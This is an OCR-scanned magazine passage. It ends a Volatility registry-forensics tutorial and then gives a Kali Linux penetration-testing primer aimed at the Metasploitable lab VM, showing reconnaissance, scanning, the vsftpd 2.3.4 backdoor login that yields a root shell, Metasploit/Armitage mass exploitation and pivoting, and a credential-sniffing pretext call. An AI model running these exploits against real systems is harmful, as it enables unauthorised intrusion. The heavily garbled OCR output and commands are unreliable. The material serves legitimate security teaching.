
ARC 

2013-12-25 

19:40: 

26 

UTC+0000 

ARC 

201 3-12-24 

09:33 : 

: 42 

LI TC +0000 

ARC 

2013-12-25 

19:44: 

:1S 

UTC+0000 

ARC 

2013-12-20 

09=14: 

: 40 

UTC+0000 

ARC 

2013-12-13 

20:42: 

:i6 

UTC+0000 

ARC 

2013 12 19 

15:26: 

: 50 

UTC -0000 

ARC 

2013-12-25 

19=44: 

: 32 

UTC+0000 

ARC 

2013-12-18 

18:36: 

06 

UTC+0000 

ARC 

2013 12 20 

07:19: 

: 00 

UTC >0006 

ARC 

2013—12—25 

19=40: 

:2b 

U 1 C +0000 

ARC 

2013-12-26 

04:45: 

: 58 

UTC+0000 

ARC 

2013-12-26 

04:20: 

: 18 

UTC+0000 

ARC 

2013— 12— 2h 

m-.m : 

: 4H 

im: +00OH 

ARC 

2013-12-26 

04:21: 

;£4 

UTC+0000 

DIR 

2013-12-20 

11=38: 

:10 

UTC+0000 

ARC 

2013-13-26 

04:2fi: 

: i n 

UTC +0000 

ARC 

2013 12 19 

86:57: 

: 54 

UTC -0000 

ARC 


I teroFos 13 04 x 7150 5 
Iterr > rosl304x715<l) 

I I b roPos 1 J 04x715 C 1 1 
I temFos 1304x7150 5 

I tomPoa 1304 x 7150 ) 

I I b roPos 1 3 04x715 Cl J 
I LcikFus 1304x7150 ) 
I tcmPoa 1304x7150) 
I tRmPnsI 304x71 SC1 ) 
I L e iuPus 13 04x715 O ) 
I temPos 13 94x7150) 
I teroFos 1304x7150) 
I t eroFos 1304x7150 ) 
I t eroPos: 1304x7150 ) 
I teroFos 1304x7150) 
I terries 1304x7150) 
E temPos 1'JH4 k 7L!» Cl J 
I tempos 1366x7680) 
I t croPoa 1366x7680 ) 
] temFnsI Hhhx/fittC 1 ) 
I LewFuiil366x7&BO ) 
I tomP-a £> 1366 x 7680 ) 
JtemPUsI 366x7600 ; 
I teroPos 1366x7690 5 


IMHUHn.LhlK 
MOZI LL"1 .LHK 
LXFLU1 ""l 
707414*1. EHE 
nCTIUE^l.MS] 
BBinin-i.Txi 
DBG_K0*1.MS] 
EflEVHM^l.LHK 
f i le . txt 
yen . u« 

IMMLI fil~l.EXE 
l1ETflSP~l.EHE 
rflTTEn^i.nE 

play .npl 
FYTHOfTi.MS] 
EUDVIN^l.EHE 
WirUbjy . Ink 
EAEYLAO.LNK 
IMHUMI^l.LHE 
nazi LL “1 . 1 .NK 
EHFIjOI "‘l 
70741 4*1 . EXE 
fiCTTUF~1 _I1K 1 
BATAIM^l.THT 


2013-12-18 
2013 12 19 
2013-12-24 
2013-12-18 
2013-12-18 
2013-12-19 
2013-12-18 
2013-12-18 
201 3-12-24 
2013-12-25 
2013-12-18 
2011-09-14 
2013 03 25 
2013-12-25 
2013-06-07 
2013 12 18 
2013-12-18 
2013-12-26 
2013-12-18 
201 3-12-19 
2013-12-24 
2013-12-18 
201 3-1 2-1 fi 
2013 12 19 


00 UTC+0000 
46 UTC-0000 
2b UlC+UUUU 
20 UTG+0000 
02 UTC+0000 
54 UIC+UUUO 
08 UTC+0000 
34 UTC+0000 
42 IITC*PI000 
18 UTC+0000 
38 UTC*0000 
24 UTC+0000 
08 UTC-0000 
32 UTC*000O 
28 UTC+0000 
56 UTC-0000 
02 U!(J*U 0 WU 
58 UTC+0000 
00 UTC *0000 
4b im:+nnun 
£6 UTC+0000 
£0 UTC*0000 
02 IITC*PI0flfi 
54 UTC-0000 


=00 UTC+0000 
: 46 UTC-0000 
= 3b UTC+UUOU 
= 28 UTC *0000 
:18 UTC*0000 
= 54 UKJ+UOUU 
=08 UTC*0000 
:34 UTC+0000 
:i4 iitc+pifiofi 
=18 UTC*0000 
:3£ UTC*0000 
:24 UTC *0000 
: 04 UTC-0000 
: 32 UTC+0000 
: 08 UTC*0000 
:22 UTC-0000 
: 02 UTC+UUUO 
=58 UTC*000O 
:0O UTC*0000 
:4h 

: 36 UTC*0000 
:28 UTC*0000 
:ifi IITC+0000 
: 54 UTC-0000 


Figure 18. Shellbags Information 


In above image you can see a snippet of shellbags plugin. As you can clearly see after this plugin we get 
a lot of information about directories and the links or file (Links or file because shellbags manage visual 
preferences like icon, size, view etc.). Now investigator have a lot information about compromised system 
like when last folder or directory was accessed and when modification, creation done. For example you can 
see in value section the screen resolution then file name. And in modification, creation and accessed section 
shows you the activity of directory or file. 

I’ll suggest you try it atleast once. And if you want to copy all the output by shellbags plugin in text file so 
use following command: 

Volatility.exe -f WinXP.raw -prof ile=WinXPSP2x8 6 shellbags > shellbags.txt 

Now everything that you can see in buffer about shellbags information that will store in shellbags text file 
and you can access it and analyze according to case. 

Chapter 7 - User Assist and Shim Cache Analysis 

In this chapter we’ll discuss about UserAssist and Shim Cache Analysis. Both analysis are important for 
Windows Registry Forensics (WRF). 


Introduction to UserAssist and Its Analysis 

UserAssist Is another important analysis In Windows registry for investigation. Windows operating system 
stores user activity in registry. 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist key in the Registry. 

UserAssist shows the program that executed in Windows with last execution (executable and links) time and 
path of executed program. 

Userassist helps the investigator to find out last program execution or which program executed on Windows. 
These all investigation done according to case. Suppose a malicious .exe file executed on compromised 
machine so userassist help the investigator to find out evidence. 
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:\MEMOR¥>Uo lability .exe -f UinXP.raw — prof ile=UinXPSF2x86 userassist 
nlfltility Fnnnffat i nn UnlaHlity Framfiwm'k 2.^.1 


Registry: SDeu iceSHarddiskUo luPielADocuments and Setfcings\Administpator\NTUSER.DAT 
Key name: Count 

Last updated: 2013-12-28 08:35:02 UTC+0000 
Subkeys : 
dallies = 

REG_BINAEV UEME_CTLSESSION : 

0x00000000 e5 10 78 0e 06 00 00 00 ..x. .... 

REG_BINAE¥ UEt1E_RUNFI DL : Kcsidl2K\MSN . Ink : 

ID: 1 

Count: 14 

Last updated: 2013-12-18 18:01:48 UTC+0000 

0x00000000 01 00 00 00 13 00 00 00 ba c8 94 38 lb fc ce 01 8 .... 

REG_BINARY UEME_RUNPIDL:Kcsidm\Windcws Media Player. Ink : 

ID: 1 

Count: 13 

Last updated: 2013-12-18 18:01:48 UTC+0000 

0x00000000 01 00 00 00 12 00 00 00 ba cB 74 38 lb Fc ce 01 8 

REG_BINAEV UEME_RUNFI DL : Xceidl2x YUindcwe Meceengar . Ink : 

ID: 1 

Count: 12 

Last updated: 2013-12-18 18:01:48 UTC+0000 

0X00000000 01 00 00 00 11 00 00 00 ba c8 94 38 lb fc ce 01 8 


Figure 19. Dumped User Assist Data for Analysis 

Volatility.exe -f WinXP.raw -prof ile=WinXPSP2x8 6 userassist 

Volatility framework provide a very good and useful plugin for dump userassist information from Windows 
registry. By below example you can see we can dump userassist information with the help of “userassist” 
plugin. In below image you can see some dumped data like REGB INARY, ID, Count, Last Updated and 
some encrypted data. The information within the binary, UserAssist values contains only statistical data on 
the applications launched by the user via Windows Explorer. 

Note 

If you want to know more about userassist and want to analyze in more better way so I’ll suggest you to read 
this article. http.V/www. aldeid. com/wiki/Windows-userassist-keys. 

Introduction to Shim Cache and Its Analysis 

Shim Cache analysis is one of my favorite analysis in Windows registry forensics (WRF). First start from 
basics, two things you have to understand “what is shim cache?” and second is “how we can analyze it for 
forensics?” So let’s start from first question what is shim cache? 

Shimcache shows all the .exe files that executes in Windows. If a file was executed with Windows to 
“CreateProcess”, It will logged in Shimcache Key. Also shimcache check application compatibility with 
Windows explorer. Userassist and Shim Cache mostly helpful malware cases. In other and easy words 
suppose a person executed Adobe photoshop on Windows OS and this application is perfectly compatible 
with Windows OS now once when Adobe photoshop will executes on Windows so logs or information will 
store in Windows registry in shim cache directory. 

Volatility framework provide shimcache plugin to dump all the shimcache data. Once when you run this 
plugin, in the output you will get all the executable that are compatible with Windows and they executed on 
same Windows machine. These type of all data stores in Windows registry. 

Volatility.exe -f Win7 . raw -f -prof ile=Win7SPlx8 6 shimcache 
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D:\MEMORV>U olatility.exe -f Win7.rau — prof ile=Uin7SPlx86 shine ache 
Volatility Foundation Volatility Framework 2.3.1 
Last Modified Path 


2009- 

2009- 

2009- 

2011 - 

2013- 

2012 - 

2009- 

2009- 

2012 - 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 

2009- 


07-14 01 
07-14 01 

07- 14 01 
11-22 21 

06- 18 14 

08- 18 05 

07- 14 01 
07-14 01 

09- 21 06 
07-14 01 
07-14 01 
07-14 01 
06-10 21 
06-10 21 
07-14 01 
07-14 01 
07-14 01 
07-14 01 
07-14 01 
07-14 01 
07-14 01 
07-14 01 


14:22 
14 = 35 
14:35 
45:45 
21:12 
38:30 
16:20 
14:42 
08:22 
14:42 
14:28 
14:44 
22:50 
22:49 
14:47 
14:41 
14:43 
14:22 
14:31 
14:35 
15:22 
14:28 


UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 

UTC+0000 
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\??\c 

\??\C 

\??\c 
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\??\C 

\??\C 
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\Uindous\system32\LogonUI .exe 
\Uindows\si;stem32\SearchFilterHost .exe 
\Uindous\si;sten32\SearchProtocolHost .exe 
\Prosfram Files\WinRflR\UinRflR.exe 
\Progran Files\Mosilla Firefox\firefox.exe 

\Program Files\Kaspersky Lab\Kaspersky flnti-Uirus 2013\ffcert.exe 

\Windous\System32\updshext .dll 

\Uindous\si;stem32\taskhost .exe 

\Windows\system32\igf xsruc .exe 

\Uindous\seru ic ing\TrustedInstaller.exe 

\Windows\system32\PING.EXE 

\Uindous\s ystem32\w32tn.exe 

\Uindows\Microsof t .NET\Framework\u2 .0.50727\cutres .exe 
\Uindous\Microsof t .NET\Franework\u2 .0.50727\csc .exe 
\Uindows\s i/stem32\wbem\umipruse . exe 
\Uindous\Si;sten32\suchost .exe 
\Uindows\si/stem32\ussuc .exe 
\Windous\systen32\lprenoue .exe 
\Uindous\Si/stem32\rundll32 .exe 
\Windous\Systen32\sdiagnhost . exe 
\Uindous\S i;stem32\gameux . dll 

\Uindows\S ystem32\powercf g.exe 


Figure 20. Dumped ShimCache Information for Analysis 


In above image you can see a snippet of shimcache information. Volatility framework’s “shimcache” plugin 
works with Windows 7 Image. 

Chapter 8 - Most Recent Used 

Now something juicy and interesting information. Most Recent Used (MRU) files. Windows registry 
stores the information of recently used items in HKCU Hive. Most recent used is one of important 
forensics methods for forensic investigator. In some cases a file was executed and system got infected or 
compromised. In this type of cases most recent used files help the investigator to find evidence. 

In HKCU hive you can find MRU items in Windows Vista and Windows7. 


HKCU\Sof tware\Microsof t\Windows\CurrentVersion\Explorer\ 
ComDlg32 \CIDSizeMRU 

Volatility.exe -f Windows7.raw --prof ile=Win7SPlx8 6 
printkey -o HKCU_Of f set (ntuser . dat ) -K 
Sof tware\Microsof t\Windows\CurrentVersion\Explorer\Co 
mDlg32 \CIDSizeMRU 

L egend: (S) = Stable (V) = Volatile 


Registry: User Specified 
Key name: CEDSizeMF.U (S) 

Last updated: 2014-01-24 13:28:18 UTC-+0000 

Subkeys: 


Values: 

REG_BINARY 20 : (S) 

0x00000000 70 00 79 00 74 00 6 S 00 6t 00 6e 00 77 00 2 e 00 p . v.t .h. o .n. w. . . 

0x00000010 Of 00 7 5 00 63 00 00 00 00 00 00 00 00 00 00 00 e x e 

0x00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

0x00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

fkrrfu'u'u'u'u'L.-l A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

Figure 21. Most Recent Used Dumped 
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In above image shows a snippet of MRU. You can see some encrypted data with recent used fde. Some data 
is clearly understandable like in this image it shows most recent visited file was pythonw.exe. 

Try these all stuff by yourself. 
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Kali Linux Primer 

by Chad Oliver 

Kali Linux is the latest version of the BackTrack Linux penetration testing, security auditing, 
and forensics distribution. It is based on Debian and comes ready to go with all the tools you 
need to begin an information security engagement. 


The amount of tools available in the distribution prevents us from going into depth on each tool, but this 
tutorial is designed to get you started with some of the most common tools you will use to perform a typical 
security audit. 

For the purposes of this tutorial we will be running a known vulnerable OS called Metasploitable which 
is available at http://www.offensivesecurity.com/metasploitunleashed/Metasploitable and we are focusing 
on network penetration testing. Kali however has much more to offer, including application testing via 
tools such as Burpsuite, and SQL Injection tools such as sqlmap. For Social Engineering engagements it is 
complete with tools such as Maltego for doing some excellent reconnaissance, BeEF for attacking browsers 
(think XSS), and it includes the Social Engineering Toolkit. 

Getting Started 

Many of the tools are command line based and clicking a tool in the menu will open a terminal window and 
show you the the help for using the tool. 


■ 


Edit View Search Terminal HeLp 


Netdiscover 0.3 -beta? [Active/passive arp reconnaissance tooll 
Written by: Jaime Penalba <jpenalbae(i)gmail .com> 


Usage: netdiscover [ -i device] [-r range | -1 file | -p] [ -s time] [-n node] [ -c 
count] [ -f] [-d] [-S] [-P] [ -C] 

-i device: your network device 

-r range: scan a given range instead of auto scan. 192 . 168 . 6 .0/24 r /16,/9 
-1 file: scan the list of ranges contained into the given file 
-p passive mode: do not send anything, only sniff 
-F filter: Customize pcap filter expression (default: "arp") 

-s time: time to sleep between each arp request (miliseconds) 

-n node: last ip octet used for scanning (from 2 to 253) 
c count: number of times to send each arp reques (for nets with packet loss) 
-f enable fastmode scan, saves a lot of time, recommended for auto 
-d ignore home config files for autoscan and fast mode 
-S enable sleep time sup cession bet wen each request (hardcore mode) 

®-P print results in a format suitable for parsing by another program 
-L in parsable output mode (-P), continue listening after the active scan is c 
uin pie Led 


If -r, -1 

root(akali 


ms 


r / / i ill i ! U V / 

or -p are not enabled, netdiscover will scan for common lan addresses. 

[J 


Figure 1. Terminal window 


Let’s begin by using netdiscover to see what is is on the network without being intrusive. We can run it in 
passive mode so it only sniffs the traffic it sees and doesn’t send anything out. Depending on the rules of 
engagement, you may want to try to stay hidden during your test and this will get you started identifying 
machines on the network. 
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Currently scanning: (passive} j 

85 Captured ARP Req/Rep packets. 

Screen View: 
from 5 hosts. 

Unique Hosts 
Total size: 51GG 

IP 

At MAC Address 

Count 

Len 

MAC Vendor 

192.168.1.1 

2G :4e :7f :3d: 64 :d6 

53 

3180 

Unknown vendor 

192.168.1.119 

08 :00:27:9c :4b :37 

06 

360 

CADMUS COMPUTER SYSTEMS 

192.168.1.128 

00: If :5b :3e:a7 :c3 

08 

480 

Apple, Inc. 

192.168.1 .140 

54 :26 :96 :4d:fe :7f 

15 

900 

Unknown vendor 

192.168.1.116 

1 

b8 :8d : 12 :0b:7e :74 

03 

180 

Unknown vendor 


Figure 2. Using as Unknown Vendor 

The second entry is our metasploitable instance. This doesn’t give us much to go on but you can see a couple 
devices on the network and their manufacturer if it’s known. So let’s take a look at the traffic and see what 
we find. 


Watching the Traffic 


Wireshark is a fantastic tool for watching, capturing, and analyzing network traffic. I’ve personally used it 
on very large incident responses to data breaches and used it to track down conversations between exploited 
systems and the external attackers. It quickly let’s you identify the protocol being used and the IP addresses 
of the machines communicating. Once you’ve identified something worth investigating you can right click 
on the capture and set up filters to watch specific conversations, IP addresses, protocols, etc. 


*ethO [Wireshark 1.10. 2 (5VN flev 51914 from /trunk-1. ID)] 


File Edit View Go Capture Analyte Statistics TeLephany Tools Internals Help 

© m * ■ ; si ini it c t i i so □ i £ o c. □ mm am 


msm 

8 


Filter: 


v Expression... 


No. Time Source 


Destination Protocol Lengtl Info 


304 7?.?5fl3Sfino( IBR.l-Ulfi 
'JOS j'S.MJ-JBOCKX 192. 16U. 1 . lit 

3 05 72 . 2583B900C 192. 168.1.116 


192.166. i.liii 
MS. a?. 735.74a 
209. 02, 236.243 
208.82. 236. 2^13 


307 72.250391001 192.160.1.115 
3WJ ya.aUBSyatXX .20tt.H2.23ti.243 
30!} 77.755305001 703. 37 . 73fl. 743 


200.02.236.243 
ItK.lWi. 1.110 


310 72 . 25839700C 192. 166 .1.116 206 . 62.. 236 . 243 

31172.258399001 192.168.1.116 206.82. 236.243 


TCP 60 http > bOOtffl [FIN, AC*] 944)1 1202 Ack :£*» Win i 

TO* 50 50530 http lAOKj Jlck=t441 V]n=5553‘| 

TCP 60 50690 > http [lOt] 5eq^509 Ack=l442 win±^ti563t 

TCP 60 50592 > http IhCKl Saq^509 Ack-1202 Win "655$ 

TCP 60 50692 * http |ACKj 5eq^509 Ack=i203 Win=6553t 

HTTP 125a HTTP/1.1 200 Ok [jPbti JPIP image] 

TCP 60 http ?- 50591 (.PIN, AfX] 9n.,=l Ack=5O0 Win: 

I cp 60 50691 > http [AOi) 5eq--j09 Ack-1196 diiV^S 

TCP 60 50591 * http f AGKl Sc q =509 flck*1199 Wiri=6553: 


|B I raiw- 2DOz 7ti bytes on wire bits) r 7U by teg captured (624 bits) on interfi 


Elba row L II, Src: Applu_Ob ; 7«:74 fh8:Sd ; 12:Cb:7a ; 74) , DsL: ftatgaar _Bd:fl4:d6 (20: 4e: 7f :8d ; 64:d6) 
mteroet Protocol Version 4, 5re: 197. 160. 1 . US { 197. H5£3. 1 . 1 1.6] , Oat: 197.166,1.1 (197-160.1.1) 
User datagram protocol, arc Port: 2U51U (2UU1U) , L'st Port; domain { jdJ 
DnrikJiin Mum - 1 1 :m [qijis-ry) 


o 4e yf ad u -1 do bB Bd 12 ub /e m oh ou 45 tx 

6 4CJ 7.1 b4 CKS 03 40 1 1 7C 33 GQ AS Of 74 C.Q -If 

•i ni nr, i* rv* * m ■*_ itf g a 7 e 01 00 00 01 

WARNING is tne highest py per: info Level | 0a 63 72 61 69 



Frame (Frame), 78 bytes 


Packets: 1401 Displayed: 1401 (100.0X) ■ Dropped: 15 (I. IX) Profile: Default 


Figure 3. Investigating 


Wireshark not only shows you the basic information about the traffic, it has two additional sections below 
that let you analyze each packet and see exactly what is being transmitted. When performing a penetration 
test it is useful to let it run for a long time and then go back through the data examining protocols used, 
active IP addresses, etc. Any protocols that can be used to transmit credentials in clear text are a great score 
such as telnet and http. For example, if you find a network router that has the web interface enabled, it’s 
certainly worth a look to see if you can catch someone logging in. Depending on your rules of engagement, 
it may be a little dirty pool, but you could set Wireshark capturing traffic while you call help desk and 
report some connectivity issues to try to get them to log into the router. Remember that any traffic is worth 
examining regardless of how mundane it may appear. During an incident response with a live APT in the 


23 




Secure Coding 


network I noticed some peculiar DNS traffic and discovered the attackers had been using DNS to exfiltrate 
data by having the compromised machines look up things such as sensitivecustomerdata.evilattackershost.ee. 
It wasn’t quite that simple, but that gives you an idea. 

Fingerprinting Devices 

Before we start making noise on the network, let’s talk about a tool that can fingerprint passively, pOf. It’s 
a great tool in general to run to watch your network just to monitor health. It will tell you what devices are 
live, their OS, what type of connection it has, distance, and uptime. I like to run it in promiscuous mode so 
executing pOf p gets us identifying systems without making a sound. In our test environment I have found 
the Metasploitable system in the results. 


.-[ 192.168.1.116/50834 ->192.168.1.119/445 [syn+ack) ]- 

| server - 192.168.1.119/445 

j os = Linux 2.6.x 

| disL = © 

| params = none 

j rawsig = 4 : 64+0:0 : 1460:mss*4,4 :mss,sok,ts,nop,ws :df :G 


Figure 4. Foundings 

We now know a little bit more about this particular server, for example it’s running Linux 2.6.x. We can start 
identifying machines in this way to help us zero in our target. For example, if your client is running some 
old outdated OS (like Windows 2000 for example) this may help you find a vulnerable system without ever 
having made a noise on the network. So far, we have only been operating in promiscuous mode and not 
sending any packets out on the network that might trip an IDS. As with all the tools mentioned in this article 
and all the other tools available on Kali Linux, you can do a little research to find lots of additional features 
that will help you do your job. 

Let’s take a moment and start making a little noise. Of course it is possible to zero in a target without making 
a wave but for the most part (unless you are intentionally evading the IDS as part of the test) your client is 
more interested in learning what you can discover in the shortest amount of time to get the biggest bang for 
their buck. It’s time we break out nmap. Nmap is a network mapping tool that is going to cut right through 
all the mess and tell us just what is running on our network, what OS, what ports are open, what services 
and versions are running, etc. It is feature rich and I encourage you to visit nmap.org and learn everything 
there is about this amazing contribution to security world. There is a wealth of options to run nmap including 
slowing the scan down to a crawl to help evade detection. Doing so will take a very long time. You can 
also increase the speed to get the task down as fast as possible. Depending on your engagement, check the 
options available and run what works best for you. You may find yourself running several scans with various 
options to help speed along your productivity. 

Taking nmap a step further and giving us the benefit of GUI, there is zenmap. Zenmap let’s us quickly use 
nmap and shows us the results in an easier to digest format. Here we have a sample of the available ports on 
our metasploitable instance. 
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Sion loulii Preble HfLp 


Zenmap 


mob 


Target: [l .0/74 V Profile: ilnrrnsr scan | V | [scan] 


Command: jnmap T4 A v 152. 16*. 1.0/24 


1 H&| S ervit 

Hmap Output Parts /Hosts Topology Host DetaiLs Scans 

05 

hml 


Pori 

Protocol Stall- 

Service 

Vernon 

* ^ 

dd (] 

4 

21 

tcp 

open 

ftp 

wsftpd 2.3.4 

m 

kali ( 

4 

22 

tcp 

open 

ssh 

QpirtSSH 4. /pi Debian Bubuntul {protocol Z.dJ 

¥ 

Chat 

4 

za 

Up 

open 

telnet 

Linux tclmcld 



4 

75 

tc P 

open 

r.tnlp 

Pu'.lfii smlpd 

* 

miniF 

4 

53 

tcp 

open 

domain 

ISC BIND 5.4.2 

P 

dat i 

4 

30 

tcp 

open 

http 

Apache httpd 2.2.3 ((Ubuntu) DAV/2) 



4 

ill 

tcp 

open 

rpebind 

2 {RPC #100000) 



4 

ia? 

Up 

open 

rmlbiub-btn 

Samba smltd 3.X (workgroup: WORKGROUP) 



4 

4-11 

tcp 

open 

nethira^ssn 

S*mh*«mbd 2 X (workgroup: WORKGROUP) 



4 

512 

tcp 

open 

rm 




4 

513 

tcp 

open 

Login 




4 

514 

tcp 

open 

shell 




4 

1099 

Up 

open 

|dvj-mn 

Java Rh4l Registry 



4 

l$24 

tcp 

open 

shell 

Mh- 1 jr.pl rut .ililr root ht-IL 



4 

7045 

ttp 

open 

nfs 

7’4 (IfPC *100603) 



4 

2121 

tcp 

open 

ftp 

PraFTPD 1.3.1 

EK 

□n 

4 

3306 

tcp 

open 

mysql 

MySQL 5.0. 5la-3ubuntu 5 

Filter Hosts 

4 

5432 

tcp 

open 

postqresql 

PostgreiQ L DQ S. 3 .0 - fl. 3 . 7 


Figure 5. Available ports 


In addition, the Topology feature of Zenmap gives os a quick glance of some insightful data. The legend is 
available at http://nmap.org/book/zenmaptopology.html but generally speaking it’s using a a green, yellow, 
red, color scheme to identify number of open ports. Red being most. If a host is identified as a router or 
switch it is indicated by square, otherwise it is a circle. We can see our Metasploitable system as a red circle. 
On a large network this can help you quickly identify a system that may be misconfigured with everything 
open, or at least we can assume it is something with a lot of roles to fill and we may find some good services 
ripe for exploiting. Of course, in the case of our example this is obviously true. 

Zenmap HDD 


Scan Tools Profile I telp 


Tdiyel. ‘ 

19 2.168. 1.0/24 [ V | Profile: 

Intense scan 

V 

Scan 


Command: nmap-T4-A -¥192,16*1,1/0/24 



Figure 6. Example of network 
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Nmap/Zenmap gives us a good view of our target and we could do some online research on our services 
version information to find what vulnerabilities exist and if there are exploits available. Kali Linux even 
helps us out here by providing a tool to search for exploits, searchsploit. 

Using our port information for our Metasploitable instance, we can run through each and see if we find 
anything. For example, running searchsploit bind 9.4.2 gives us a hit. 


rootpkali:-# searchsploit bind 9.4.2 

Description Pat 


3IND 9. 4. 1-9. 4. 2 - Remote DNS Cache Poisoning Flaw Exploit (meta) /mul 

tiple/ remote/6 122 . rb 

rootfdkali:-# | 


Figure 7. Running searchploit bind 9.4.2. 

If our engagement involves a vulnerability assessment Kali Linux provides us with a great tool for 
conducting assessments, OpenVAS. OpenVAS allows you to setup target lists, create schedules, define 
what sort of tests to be run, and of course execute the test. I’ve run OpenVAS against our Metasploitable 
instance to see what it finds. To do so, we first setup our target in the Targets tab at the bottom right of the 
GUI. Next we switch to the Tasks tab and set a task of running the scan against the target. For the purposes 
of the demo, I set the target to the Metasploitable target and the set the Scan Config option to “Full and 
very deep ultimate.” Depending on your engagement you can adjust the Scan Config. You can even switch 
to the Scan Configs tab and define your own scan configs to do things like only run certain types of 
checks. This may be helpful for doing scans based on compliance guidelines. While we’re exploring some 
of the options, it’s worth mentioning there is a tab to supply credentials to the scan which will enhance 
your results. If your client wants a deeper more accurate report they may supply you with domain/root 
credentials so the scanner can get onto the system and get better results. It may also be the case that while 
you were watching traffic in Wireshark you managed to get some credentials which you can now enter into 
the scanner to get more info on that device and quite possibly, if the credentials are used elsewhere you 
can get into those systems too. Once our scan is complete, OpenVAS presents us with a nice dashboard 
showing some highlights of the scan results. 

l Green bane Sec urfty Desktap 


hie Task View Settings Extras hHeLp 

n ac kkn 



Figure 8. Open VAS dashboard 


We can quickly see there are 47 High Risk vulnerabilities found during our scan. Clicking on the Reports tab 
in the bottom right of the screen and then the magnifying glass button we can see our results, open in a new 
tab. From here, we can view the results or we can choose various export formats and save the report. 
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In general, I usually export as PDF to include in my findings document I turn into the client. The reports are 
not flashy, but they get the data you need. 


repcrt-5e5 8 aald-007e-4e$c-bd c3-3436a0G9aG50.pdf 
File Edit View Go Bookmarks- Help 


^ Pic 


^ Next ‘‘t 


(4 oMS) I- it Pjye Width ^ 


I ndex v X 


Result Overview 
- Results per Host 
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:| 
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5 
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8 

High irtef //Icp) 

13 
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36 
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17 
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22 
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33 
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Figure 9. Datas 


The layout is pretty self explanatory and the Index included in the PDF can help you navigate right to the 
vulnerability you want to investigate further. The screenshot shows the first on in the list. In this case we have 
a backdoor vulnerability in vsftpd. Included in all results is a summary if the issue, a solution to resolve it (if 
available), and some reference links to learn more about the vulnerability which can be used to find an actual 
exploit for the vulnerability. Now that we have a vulnerability, let’s go ahead and take a look at an exploit. 


Exploiting Targets 

Previously, we found a bunch of vulnerabilities on our Metasploitable instance. No surprise considering it’s 
designed that way. Let’s take a look at the above mention issue and see how we can exploit it. In this case, 
we can do it without any additional tools. There is a simple backdoor that is ready to exploit. Simply putting 
an emoticon smiley face at the end of the user name opens a listening shell on port 6200. Let’s try. 


:~# telnet 192.168.1.119 21 
Trying 192.168.1.119.. . 

Connected to 192.168.1.119. 

Escape character is 1 A ] ' . 

220 [vsFTPd 2.3.4) 
user oops : ) 

331 Please specify the password, 
pass doesnotmatter 

telnet> quit 
Connection closed. 

i:~# telnet 192.168.1.119 620© 
Trying 192.168.1.119.. . 

Connected to 192.168.1.119. 

Escape character is 1 A ] ' . 
id; 

uid=0 ( root ) gid=0 ( root ) 


Figure 10. Port 6200 
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We open a terminal and telnet to port 21. Once connected we simply enter user oops:) followed by pass 
with anything you choose as it doesn’t matter. Escape the session and telnet to port 6200 and we are in. 

That wasn’t too terribly exciting, but mission accomplished and had we been operating with an effort 
to remain stealthy we could have discovered that and exploited it all with limited ability to detect our 
attack. Let’s take a look at an exploit tool. Metasploit. Metasploit is an exploit framework designed for 
penetration testing. It has several interfaces that use the command line, and the latest version has a web 
interface. There is also a commercial version, but that is obviously not going to come ready to go with Kali 
Linux. Armitage is included in Kali Linux and gives us a nice interface for an attack platform. 

It uses nmap and other tools to help us find targets. Start Armitage and it will connect to metasploit if you 
have it running, otherwise it will start the service for you. Additionally, it will provide you with some help 
when starting such as telling you how to start the database if that is not already running. Once we get it 
open, we’re ready to begin. Since we are focusing on this single server let’s go ahead and add the host to 
Armitage. Under the Hosts menu we can click Add Host and enter the IP address of our target. 

Once our host is added to Armitage it is represented by a monitor in the main workspace. We can right 
click on it and select scan to get some more data about it. Doing this opens a new tab on the bottom and 
we can watch the scan in action. Once complete, we can see what the OS is and the services running on 
it. Similar to our findings using nmap. Right clicking the server and choosing Services opens us a new tab 
and lists the available services. You can see the services below and it has given us a visual reference in 
the workspace identifying the OS of the host. This can help you when looking at a large range of hosts to 
identify various operating systems you may want to dive into. 
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Figure 11. Hosts 

From here, we can search the upper left area for an exploit to use against the services, for example, going 
back to the previous exploit which is highlighted in the above screenshot, I have searched for vsftp and 
found our exploit is available in Metasploit. 
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Figure 12. Exploits 

Double clicking our exploit brings up the ability to launch the exploit. Note that launching an exploit 
this way does not fill in all the data needed to execute. In this case, we need to supply the IP of our target 
in RHOST. Once we do that and click the launch button a new tab is opened at the bottom and it shows 
us our exploit in action. We can see the exploit was successful and notice the icon in the workspace has 
changed to represent an exploited system. 
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Figure 13. Icon in the workspace 

Right clicking the host in the workspace shows us a new option in the menu. This is is called Shell 1 and 
going to that we can select Interact which will gives a new tab at the bottom showing us our shell. I have 
run ifeonfig to verify the IP is our target system. 
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Figure 14. Selecting Interact 

WE can take advantage of another feature of armitage to help us find exploits. Under the Attack menu 
there is the option to Find Attacks. Doing this will automate the process of finding an attack suitable for 
our target and give us a new option in the pop up menu when right clicking our target in the workspace, 
using this Attack menu, we can launch an attack directly with the attack data prefilled and ready to go. 

While we are looking at the main Attack menu, you may have noticed the option called Hail Mary located 
under the Find Attacks option. This option will launch a flood of attacks trying everything it can to 
infiltrate the selected targets. Using this option will light up an IDS system so if you haven’t already, make 
sure you are whitelisted on their IDS system so you don’t overwhelm the system. After launching the Hail 
Mary option it will open a new tab below and show all the attacks being launched. When it’s complete it 
will list the shells it opened and right clicking our target in the workspace shows us a list of shells we can 
then select to interact with. 
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Figure 15. List of shells 
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From this point, we can use the compromised machine to pivot and launch attacks against other systems on 
the network through this compromised host, all while remaining inside our Armitage work environment. 

Conclusion 

Kali Linux is a versatile tool and should be a part of every penetration testers arsenal. It is a complete attack 
tool and can be run as a Live CD (which is excellent if you are working on a forensics project), and be installed 
directly to a machine or virtual machine. Of course, you can always add any other tools you come across that 
are not part of Kali. I have been in this business for years, and BackTrack/Kali is my OS of choice on all my 
penetration testing engagements. We’ve only scratched the surface of what it has to offer and I hope you’ve 
enjoyed this introduction and I encourage you to dive in and leam every tool it has to offer. 
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